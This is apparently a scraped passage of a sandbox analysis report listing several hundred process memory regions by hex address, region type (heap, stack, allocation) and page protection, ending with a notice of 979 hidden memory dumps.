heap
|
page read and write
|
||
|
5362000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
1326F94A000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
5038000
|
heap
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
7FFD34866000
|
trusted library allocation
|
page execute and read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
1DBAE0C3000
|
heap
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
13271823000
|
heap
|
page read and write
|
||
|
5058000
|
heap
|
page read and write
|
||
|
1DB94285000
|
heap
|
page read and write
|
||
|
5328000
|
heap
|
page read and write
|
||
|
3219000
|
heap
|
page read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
1CACEFE000
|
stack
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
20110000
|
direct allocation
|
page read and write
|
||
|
1DB9659F000
|
trusted library allocation
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
1326F940000
|
heap
|
page read and write
|
||
|
20FDC000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
1DB95BFA000
|
heap
|
page read and write
|
||
|
1CAE10D000
|
stack
|
page read and write
|
||
|
20B1F000
|
stack
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
1326F949000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
1DB94250000
|
heap
|
page read and write
|
||
|
791E000
|
stack
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
2BDF000
|
stack
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
85FC000
|
stack
|
page read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
4E8F000
|
stack
|
page read and write
|
||
|
76E9000
|
heap
|
page read and write
|
||
|
5E11000
|
trusted library allocation
|
page read and write
|
||
|
20CBE000
|
stack
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
5328000
|
heap
|
page read and write
|
||
|
1DBAE290000
|
heap
|
page execute and read and write
|
||
|
1DB97B20000
|
trusted library allocation
|
page read and write
|
||
|
304F000
|
stack
|
page read and write
|
||
|
20D7D000
|
stack
|
page read and write
|
||
|
13271809000
|
heap
|
page read and write
|
||
|
1DB97B1B000
|
trusted library allocation
|
page read and write
|
||
|
13271329000
|
heap
|
page read and write
|
||
|
5332000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
8860000
|
heap
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
8B00000
|
direct allocation
|
page read and write
|
||
|
1326F8E0000
|
heap
|
page read and write
|
||
|
4E11000
|
trusted library allocation
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
21051000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
1327132B000
|
heap
|
page read and write
|
||
|
2F5B000
|
heap
|
page read and write
|
||
|
1DB97B32000
|
trusted library allocation
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
5365000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
5331000
|
heap
|
page read and write
|
||
|
2097E000
|
stack
|
page read and write
|
||
|
2062D000
|
stack
|
page read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
1326F915000
|
heap
|
page read and write
|
||
|
7160000
|
direct allocation
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DBA5D81000
|
trusted library allocation
|
page read and write
|
||
|
3217000
|
heap
|
page read and write
|
||
|
799D000
|
stack
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
5365000
|
heap
|
page read and write
|
||
|
20FDC000
|
heap
|
page read and write
|
||
|
1CAE18A000
|
stack
|
page read and write
|
||
|
3230000
|
heap
|
page readonly
|
||
|
8AD0000
|
direct allocation
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
1CACBC3000
|
stack
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1326F8D5000
|
heap
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
5351000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
7FFD34782000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
20FC9000
|
heap
|
page read and write
|
||
|
8530000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
1326F8E8000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
7170000
|
direct allocation
|
page read and write
|
||
|
8A70000
|
trusted library allocation
|
page read and write
|
||
|
2F7F000
|
heap
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
4F45000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
1DB95C2E000
|
heap
|
page read and write
|
||
|
1DB95BFC000
|
heap
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
1DB96563000
|
trusted library allocation
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
88D4000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library section
|
page read and write
|
||
|
1326F7E0000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DBAE2E2000
|
heap
|
page read and write
|
||
|
510C000
|
heap
|
page read and write
|
||
|
5118000
|
heap
|
page read and write
|
||
|
20910000
|
direct allocation
|
page read and write
|
||
|
1326F8FE000
|
heap
|
page read and write
|
||
|
212F0000
|
heap
|
page read and write
|
||
|
533B000
|
heap
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
5362000
|
heap
|
page read and write
|
||
|
8870000
|
heap
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
7710000
|
heap
|
page read and write
|
||
|
1DBAE2A8000
|
heap
|
page read and write
|
||
|
200E0000
|
direct allocation
|
page read and write
|
||
|
1326F939000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
2BCC000
|
stack
|
page read and write
|
||
|
C38A1FF000
|
stack
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
211EB000
|
heap
|
page read and write
|
||
|
8A60000
|
trusted library allocation
|
page read and write
|
||
|
4D36000
|
heap
|
page read and write
|
||
|
5328000
|
heap
|
page read and write
|
||
|
20DBE000
|
stack
|
page read and write
|
||
|
1326F94A000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
5345000
|
heap
|
page read and write
|
||
|
2E48000
|
heap
|
page read and write
|
||
|
1326F8F5000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1326FB3A000
|
heap
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
1327182D000
|
heap
|
page read and write
|
||
|
1008FF000
|
stack
|
page read and write
|
||
|
20DFC000
|
stack
|
page read and write
|
||
|
20FEA000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
1326F8E0000
|
heap
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
2FE8000
|
heap
|
page read and write
|
||
|
4C0E000
|
stack
|
page read and write
|
||
|
1326FB30000
|
heap
|
page read and write
|
||
|
2D1C000
|
heap
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
3293000
|
heap
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
27762EF0000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
533B000
|
heap
|
page read and write
|
||
|
8840000
|
heap
|
page read and write
|
||
|
1DB96598000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
88BB000
|
heap
|
page read and write
|
||
|
1326F90D000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
2BEE000
|
stack
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
21050000
|
heap
|
page read and write
|
||
|
4D5E000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
1DB9410B000
|
heap
|
page read and write
|
||
|
1326F93E000
|
heap
|
page read and write
|
||
|
21143000
|
heap
|
page read and write
|
||
|
1326F8F5000
|
heap
|
page read and write
|
||
|
7729000
|
heap
|
page read and write
|
||
|
2BEA000
|
stack
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
1DB94071000
|
heap
|
page read and write
|
||
|
5321000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
5E76000
|
trusted library allocation
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
734D000
|
stack
|
page read and write
|
||
|
1326F8A1000
|
heap
|
page read and write
|
||
|
20120000
|
direct allocation
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
4D3B000
|
heap
|
page read and write
|
||
|
21021000
|
heap
|
page read and write
|
||
|
1326F8F5000
|
heap
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
211BC000
|
heap
|
page read and write
|
||
|
20A0E000
|
stack
|
page read and write
|
||
|
20EA1000
|
direct allocation
|
page execute and read and write
|
||
|
8A50000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
1DB94098000
|
heap
|
page read and write
|
||
|
1DB97B34000
|
trusted library allocation
|
page read and write
|
||
|
728D000
|
stack
|
page read and write
|
||
|
217F0000
|
heap
|
page read and write
|
||
|
4DB0000
|
heap
|
page execute and read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
1DB96FB6000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
1326F939000
|
heap
|
page read and write
|
||
|
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
|
31FA000
|
trusted library allocation
|
page execute and read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
20E70000
|
unclassified section
|
page execute and read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
1326F900000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
92A0000
|
direct allocation
|
page execute and read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1326F90E000
|
heap
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
There are 979 hidden memdumps, click here to show them.